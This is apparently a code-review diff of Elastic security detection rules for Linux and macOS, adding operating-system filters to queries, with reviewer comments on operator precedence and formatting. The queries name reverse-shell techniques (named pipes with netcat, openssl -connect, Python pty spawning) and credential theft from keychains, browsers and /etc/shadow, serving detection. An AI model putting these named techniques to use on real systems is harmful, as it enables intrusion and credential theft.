+++ b/rules/linux/execution_python_tty_shell.toml
@@ -2,7 +2,7 @@ creation_date = "2020/04/15"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -27,7 +27,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:linux and event.type:(start or process_started) and
 process.name:python* and
 process.args:("import pty; pty.spawn(\"/bin/sh\")" or
 "import pty; pty.spawn(\"/bin/dash\")" or
diff --git a/rules/linux/execution_reverse_shell_via_named_pipe.toml b/rules/linux/execution_reverse_shell_via_named_pipe.toml
index 6ccabe46d..a6fd00e19 100644
--- a/rules/linux/execution_reverse_shell_via_named_pipe.toml
+++ b/rules/linux/execution_reverse_shell_via_named_pipe.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -39,10 +39,10 @@ type = "eql"
 query = '''
 sequence by host.id with maxspan = 5s
- [process where event.type == "start" and process.executable : ("/usr/bin/mkfifo","/usr/bin/mknod") and process.args:("/tmp/*","$*")]
- [process where process.executable : ("/bin/sh","/bin/bash") and process.args:("-i") or
+ [process where host.os.type == "linux" and event.type == "start" and process.executable : ("/usr/bin/mkfifo","/usr/bin/mknod") and process.args:("/tmp/*","$*")]
+ [process where host.os.type == "linux" and process.executable : ("/bin/sh","/bin/bash") and process.args:("-i") or
 (process.executable: ("/usr/bin/openssl") and process.args: ("-connect"))]
- [process where (process.name:("nc","ncat","netcat","netcat.openbsd","netcat.traditional") or
+ [process where host.os.type == "linux" and (process.name:("nc","ncat","netcat","netcat.openbsd","netcat.traditional") or
 (process.name: "openssl" and process.executable: "/usr/bin/openssl"))]
 '''
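Review bot: In the second stage of the named-pipe sequence, `host.os.type == "linux" and process.executable : ("/bin/sh","/bin/bash") and process.args:("-i") or (process.executable: ("/usr/bin/openssl") and process.args: ("-connect"))` binds `and` tighter than `or`, so the new OS filter guards only the shell branch and the `openssl -connect` branch still matches on any OS — the filter this commit sets out to add is not applied uniformly. Parenthesising the alternatives, `[process where host.os.type == "linux" and ((process.executable : ("/bin/sh","/bin/bash") and process.args:("-i")) or (process.executable: ("/usr/bin/openssl") and process.args: ("-connect")))]`, applies it to both; the third stage already wraps its `or` in parentheses, so this is the only stage affected. This stage also carries no `event.type == "start"` guard, unlike the first, which may be deliberate but deserves a comment.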
diff --git a/rules/linux/execution_shell_evasion_linux_binary.toml b/rules/linux/execution_shell_evasion_linux_binary.toml
index 13c902745..9d416f247 100644
--- a/rules/linux/execution_shell_evasion_linux_binary.toml
+++ b/rules/linux/execution_shell_evasion_linux_binary.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/19"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -102,7 +102,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "linux" and event.type == "start" and
 (
 /* launch shells from unusual process */
 (process.name == "capsh" and process.args == "--") or
diff --git a/rules/linux/execution_tc_bpf_filter.toml b/rules/linux/execution_tc_bpf_filter.toml
index 0dda8bb65..1b0f53152 100644
--- a/rules/linux/execution_tc_bpf_filter.toml
+++ b/rules/linux/execution_tc_bpf_filter.toml
@@ -3,7 +3,7 @@ creation_date = "2022/07/11"
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 integration = ["endpoint"]
 [rule]
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type != "end" and process.executable : "/usr/sbin/tc" and process.args : "filter" and process.args : "add" and process.args : "bpf" and not process.parent.executable: "/usr/sbin/libvirtd"
+process where host.os.type == "linux" and event.type != "end" and process.executable : "/usr/sbin/tc" and process.args : "filter" and process.args : "add" and process.args : "bpf" and not process.parent.executable: "/usr/sbin/libvirtd"
 '''
 [[rule.threat]]
diff --git a/rules/linux/impact_process_kill_threshold.toml b/rules/linux/impact_process_kill_threshold.toml
index 0094932a3..6a05ba18b 100644
--- a/rules/linux/impact_process_kill_threshold.toml
+++ b/rules/linux/impact_process_kill_threshold.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -54,7 +54,7 @@ tags = ["Elastic", "Host", "Linux", "Threat Detection", "Impact", "Investigation
 type = "threshold"
 query = '''
-event.category:process and event.type:start and process.name:"pkill" and process.args:"-f"
+event.category:process and host.os.type:linux and event.type:start and process.name:"pkill" and process.args:"-f"
 '''
diff --git a/rules/linux/lateral_movement_telnet_network_activity_external.toml b/rules/linux/lateral_movement_telnet_network_activity_external.toml
index 2064ee16b..d8141aa84 100644
--- a/rules/linux/lateral_movement_telnet_network_activity_external.toml
+++ b/rules/linux/lateral_movement_telnet_network_activity_external.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -34,8 +34,8 @@ type = "eql"
 query = '''
 sequence by process.entity_id
- [process where process.name == "telnet" and event.type == "start"]
- [network where process.name == "telnet" and
+ [process where host.os.type == "linux" and process.name == "telnet" and event.type == "start"]
+ [network where host.os.type == "linux" and process.name == "telnet" and
 not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24",
diff --git a/rules/linux/lateral_movement_telnet_network_activity_internal.toml b/rules/linux/lateral_movement_telnet_network_activity_internal.toml
index aa0b69868..7c688d19d 100644
--- a/rules/linux/lateral_movement_telnet_network_activity_internal.toml
+++ b/rules/linux/lateral_movement_telnet_network_activity_internal.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -34,8 +34,8 @@ type = "eql"
 query = '''
 sequence by process.entity_id
- [process where process.name == "telnet" and event.type == "start"]
- [network where process.name == "telnet" and
+ [process where host.os.type == "linux" and process.name == "telnet" and event.type == "start"]
+ [network where host.os.type == "linux" and process.name == "telnet" and
 cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24",
diff --git a/rules/linux/persistence_chkconfig_service_add.toml b/rules/linux/persistence_chkconfig_service_add.toml
index 217271f11..0ae49e23e 100644
--- a/rules/linux/persistence_chkconfig_service_add.toml
+++ b/rules/linux/persistence_chkconfig_service_add.toml
@@ -3,7 +3,7 @@ creation_date = "2022/07/22"
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/19"
+updated_date = "2023/02/22"
 integration = ["endpoint"]
 [rule]
@@ -27,7 +27,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "linux" and event.type == "start" and
 (
 (process.executable : "/usr/sbin/chkconfig" and process.args : "--add") or
 (process.args : "*chkconfig" and process.args : "--add")
diff --git a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml
index 0771b8679..0538db141 100644
--- a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml
+++ b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/27"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:file and event.type:change and
+event.category:file and host.os.type:linux and event.type:change and
 process.name:* and (file.path:(/usr/sbin/sshd or /usr/bin/ssh or /usr/bin/sftp or /usr/bin/scp) or file.name:libkeyutils.so) and not process.name:("dpkg" or "yum" or "dnf" or "dnf-automatic")
diff --git a/rules/linux/persistence_dynamic_linker_backup.toml b/rules/linux/persistence_dynamic_linker_backup.toml
index 100f37b25..634fbb50a 100644
--- a/rules/linux/persistence_dynamic_linker_backup.toml
+++ b/rules/linux/persistence_dynamic_linker_backup.toml
@@ -3,7 +3,7 @@ creation_date = "2022/07/12"
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/15"
+updated_date = "2023/02/22"
 integration = ["endpoint"]
 [rule]
@@ -27,8 +27,9 @@ type = "eql"
 query = '''
 sequence by process.entity_id with maxspan=1m
-[process where event.type == "start" and process.name : ("cp", "rsync") and process.args : ("/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2", "/etc/ld.so.preload")]
-[file where event.action == "creation" and file.extension == "so"]
+[process where host.os.type == "linux" and event.type == "start" and process.name : ("cp", "rsync") and
+ process.args : ("/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2", "/etc/ld.so.preload")]
+[file where host.os.type == "linux" and event.action == "creation" and file.extension == "so"]
 '''
 [[rule.threat]]
diff --git a/rules/linux/persistence_etc_file_creation.toml b/rules/linux/persistence_etc_file_creation.toml
index a6fa6abc0..21001ce16 100644
--- a/rules/linux/persistence_etc_file_creation.toml
+++ b/rules/linux/persistence_etc_file_creation.toml
@@ -3,7 +3,7 @@ creation_date = "2022/07/22"
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 integration = ["endpoint"]
 [rule]
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type == "creation" and user.name == "root" and
+file where host.os.type == "linux" and event.type == "creation" and user.name == "root" and
 file.path : ("/etc/ld.so.conf.d/*", "/etc/cron.d/*", "/etc/sudoers.d/*", "/etc/rc.d/init.d/*", "/etc/systemd/system/*") and not process.executable : ("*/dpkg", "*/yum", "*/apt", "*/dnf", "*/systemd", "*/snapd", "*/dnf-automatic", "*/yum-cron", "*/elastic-agent", "*/dnfdaemon-system")
diff --git a/rules/linux/persistence_insmod_kernel_module_load.toml b/rules/linux/persistence_insmod_kernel_module_load.toml
index 7ec3a0beb..591662183 100644
--- a/rules/linux/persistence_insmod_kernel_module_load.toml
+++ b/rules/linux/persistence_insmod_kernel_module_load.toml
@@ -3,7 +3,7 @@ creation_date = "2022/07/11"
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 integration = ["endpoint"]
 [rule]
@@ -27,7 +27,8 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and process.executable : "/usr/sbin/insmod" and process.args : "*.ko"
+process where host.os.type == "linux" and event.type == "start" and
+ process.executable : "/usr/sbin/insmod" and process.args : "*.ko"
 '''
 [[rule.threat]]
diff --git a/rules/linux/persistence_kde_autostart_modification.toml b/rules/linux/persistence_kde_autostart_modification.toml
index 3d3c5d46e..489c66972 100644
--- a/rules/linux/persistence_kde_autostart_modification.toml
+++ b/rules/linux/persistence_kde_autostart_modification.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -34,7 +34,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type != "deletion" and
+file where host.os.type == "linux" and event.type != "deletion" and
 file.extension in ("sh", "desktop") and
 file.path : (
diff --git a/rules/linux/persistence_shell_activity_by_web_server.toml b/rules/linux/persistence_shell_activity_by_web_server.toml
index 873ff4b35..4045bd12c 100644
--- a/rules/linux/persistence_shell_activity_by_web_server.toml
+++ b/rules/linux/persistence_shell_activity_by_web_server.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -74,7 +74,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:linux and event.type:(start or process_started) and
 process.name:(bash or dash or ash or zsh or "python*" or "perl*" or "php*") and
 process.parent.name:("apache" or "nginx" or "www" or "apache2" or "httpd" or "www-data")
 '''
diff --git a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml
index f3bb6ebd2..6c7d2d475 100644
--- a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml
+++ b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:file and not event.type:deletion and file.path:/etc/ld.so.preload
+event.category:file and host.os.type:linux and not event.type:deletion and file.path:/etc/ld.so.preload
 '''
diff --git a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml
index 618680c73..79d8776f9 100644
--- a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml
+++ b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where file.path : "/*GCONV_PATH*"
+file where host.os.type == "linux" and file.path : "/*GCONV_PATH*"
 '''
diff --git a/rules/linux/privilege_escalation_shadow_file_read.toml b/rules/linux/privilege_escalation_shadow_file_read.toml
index ec61e8606..de190da0d 100644
--- a/rules/linux/privilege_escalation_shadow_file_read.toml
+++ b/rules/linux/privilege_escalation_shadow_file_read.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/23"
+updated_date = "2023/03/01"
 [rule]
 author = ["Elastic"]
@@ -27,7 +27,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and event.action == "exec" and user.name == "root"
+process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and user.name == "root"
 and (process.args : "/etc/shadow" or (process.working_directory: "/etc" and process.args: "shadow")) and not process.executable: ("/usr/bin/tar",
diff --git a/rules/linux/privilege_escalation_unshare_namesapce_manipulation.toml b/rules/linux/privilege_escalation_unshare_namesapce_manipulation.toml
index 52917f273..3b9902dae 100644
--- a/rules/linux/privilege_escalation_unshare_namesapce_manipulation.toml
+++ b/rules/linux/privilege_escalation_unshare_namesapce_manipulation.toml
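Review bot: `updated_date` in privilege_escalation_shadow_file_read.toml moves from `2023/02/23` to `2023/03/01`, while every other file touched by this batch is set to `2023/02/22`; the starting value is itself later than the batch date, so this hunk looks like it was rebased in from a separate edit. If that is the case the date is fine but the description should say so; otherwise align it with the rest, `updated_date = "2023/02/22"`. The query's `not process.executable:` exclusion list continues outside the hunk.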
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/20"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and event.action : ("exec", "exec_event") and
+process where host.os.type == "linux" and event.type == "start" and event.action : ("exec", "exec_event") and
 process.executable: "/usr/bin/unshare" and
 not process.parent.executable: ("/usr/bin/udevadm", "*/lib/systemd/systemd-udevd", "/usr/bin/unshare") and
 not process.args : "/usr/bin/snap"
diff --git a/rules/macos/credential_access_access_to_browser_credentials_procargs.toml b/rules/macos/credential_access_access_to_browser_credentials_procargs.toml
index 20b119839..a7e9eedcd 100644
--- a/rules/macos/credential_access_access_to_browser_credentials_procargs.toml
+++ b/rules/macos/credential_access_access_to_browser_credentials_procargs.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type in ("start", "process_started") and
+process where host.os.type == "macos" and event.type in ("start", "process_started") and
 process.args :
 (
 "/Users/*/Library/Application Support/Google/Chrome/Default/Login Data",
diff --git a/rules/macos/credential_access_credentials_keychains.toml b/rules/macos/credential_access_credentials_keychains.toml
index 3a447c4a9..2f1aaebad 100644
--- a/rules/macos/credential_access_credentials_keychains.toml
+++ b/rules/macos/credential_access_credentials_keychains.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -34,7 +34,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type in ("start", "process_started") and
+process where host.os.type == "macos" and event.type in ("start", "process_started") and
 process.args :
 (
 "/Users/*/Library/Keychains/*",
diff --git a/rules/macos/credential_access_dumping_hashes_bi_cmds.toml b/rules/macos/credential_access_dumping_hashes_bi_cmds.toml
index 9c88507f6..d41ca30f8 100644
--- a/rules/macos/credential_access_dumping_hashes_bi_cmds.toml
+++ b/rules/macos/credential_access_dumping_hashes_bi_cmds.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:start and
+event.category:process and host.os.type:macos and event.type:start and
 process.name:(defaults or mkpassdb) and process.args:(ShadowHashData or "-dump")
 '''
diff --git a/rules/macos/credential_access_dumping_keychain_security.toml b/rules/macos/credential_access_dumping_keychain_security.toml
index 50737b541..85d09b4bf 100644
--- a/rules/macos/credential_access_dumping_keychain_security.toml
+++ b/rules/macos/credential_access_dumping_keychain_security.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -31,7 +31,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type in ("start", "process_started") and process.args : "dump-keychain" and process.args : "-d"
+process where host.os.type == "macos" and event.type in ("start", "process_started") and process.args : "dump-keychain" and process.args : "-d"
 '''
diff --git a/rules/macos/credential_access_kerberosdump_kcc.toml b/rules/macos/credential_access_kerberosdump_kcc.toml
index 5266adcc4..ace073d9f 100644
--- a/rules/macos/credential_access_kerberosdump_kcc.toml
+++ b/rules/macos/credential_access_kerberosdump_kcc.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:macos and event.type:(start or process_started) and
 process.name:kcc and process.args:copy_cred_cache
 '''
diff --git a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml
index e18a7223b..fde2a36d0 100644
--- a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml
+++ b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -37,7 +37,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "macos" and event.type == "start" and
 process.name : "security" and process.args : "-wa" and process.args : ("find-generic-password", "find-internet-password") and
 process.args : ("Chrome*", "Chromium", "Opera", "Safari*", "Brave", "Microsoft Edge", "Edge", "Firefox*") and
 not process.parent.executable : "/Applications/Keeper Password Manager.app/Contents/Frameworks/Keeper Password Manager Helper*/Contents/MacOS/Keeper Password Manager Helper*"
diff --git a/rules/macos/credential_access_mitm_localhost_webproxy.toml b/rules/macos/credential_access_mitm_localhost_webproxy.toml
index 8a3c69138..872f7158e 100644
--- a/rules/macos/credential_access_mitm_localhost_webproxy.toml
+++ b/rules/macos/credential_access_mitm_localhost_webproxy.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category : process and event.type : start and
+event.category:process and host.os.type:macos and event.type:start and
 process.name : networksetup and process.args : (("-setwebproxy" or "-setsecurewebproxy" or "-setautoproxyurl") and not (Bluetooth or off)) and
 not process.parent.executable : ("/Library/PrivilegedHelperTools/com.80pct.FreedomHelper" or
 "/Applications/Fiddler Everywhere.app/Contents/Resources/app/out/WebServer/Fiddler.WebUi" or
diff --git a/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml b/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml
index be115470a..642a62a88 100644
--- a/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml
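Review bot: The rewritten first line of the credential_access_mitm_localhost_webproxy.toml query drops the spaced `field : value` KQL form (`event.category : process and event.type : start and` becomes `event.category:process and ... event.type:start and`), but the unchanged lines that follow keep the spaced form (`process.name : networksetup and process.args : (...)`, `not process.parent.executable : (...)`), so one query now mixes two styles. Either insert the new clause in the existing shape, `event.category : process and host.os.type : macos and event.type : start and`, or normalize the whole query in one pass the way the mount_apfs hunk later in this batch does for both of its lines. The exclusion list continues outside the hunk.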
+++ b/rules/macos/credential_access_potential_macos_ssh_bruteforce.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -25,7 +25,7 @@ tags = ["Elastic", "Host", "macOS", "Threat Detection", "Credential Access"]
 type = "threshold"
 query = '''
-event.category:process and event.type:start and process.name:"sshd-keygen-wrapper" and process.parent.name:launchd
+event.category:process and host.os.type:macos and event.type:start and process.name:"sshd-keygen-wrapper" and process.parent.name:launchd
 '''
diff --git a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml
index 17e59225a..a404e86cc 100644
--- a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml
+++ b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -33,7 +33,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type in ("start", "process_started") and process.name : "osascript" and
+process where host.os.type == "macos" and event.type in ("start", "process_started") and process.name : "osascript" and
 process.command_line : "osascript*display dialog*password*"
 '''
diff --git a/rules/macos/credential_access_systemkey_dumping.toml b/rules/macos/credential_access_systemkey_dumping.toml
index 40256bcd3..73ab18fb6 100644
--- a/rules/macos/credential_access_systemkey_dumping.toml
+++ b/rules/macos/credential_access_systemkey_dumping.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -27,7 +27,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:macos and event.type:(start or process_started) and
 process.args:("/private/var/db/SystemKey" or "/var/db/SystemKey")
 '''
diff --git a/rules/macos/defense_evasion_apple_softupdates_modification.toml b/rules/macos/defense_evasion_apple_softupdates_modification.toml
index 2489f6c13..69ba7f1d4 100644
--- a/rules/macos/defense_evasion_apple_softupdates_modification.toml
+++ b/rules/macos/defense_evasion_apple_softupdates_modification.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -27,7 +27,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:macos and event.type:(start or process_started) and
 process.name:defaults and process.args:(write and "-bool" and (com.apple.SoftwareUpdate or /Library/Preferences/com.apple.SoftwareUpdate.plist) and not (TRUE or true))
 '''
diff --git a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml
index 69a5e53a2..9ec1463be 100644
--- a/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml
+++ b/rules/macos/defense_evasion_attempt_del_quarantine_attrib.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -34,7 +34,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type in ("start", "process_started") and
+process where host.os.type == "macos" and event.type in ("start", "process_started") and
 process.name : "xattr" and
 (
 (process.args : "com.apple.quarantine" and process.args : ("-d", "-w")) or
diff --git a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml
index 0e490a060..406470e80 100644
--- a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml
+++ b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and event.type:(start or process_started) and
+event.category:process and host.os.type:macos and event.type:(start or process_started) and
 process.args:(spctl and "--master-disable")
 '''
diff --git a/rules/macos/defense_evasion_install_root_certificate.toml b/rules/macos/defense_evasion_install_root_certificate.toml
index 1a41289ca..3e5071eb5 100644
--- a/rules/macos/defense_evasion_install_root_certificate.toml
+++ b/rules/macos/defense_evasion_install_root_certificate.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,7 +29,7 @@ timestamp_override = "event.ingested"
 type = "query"
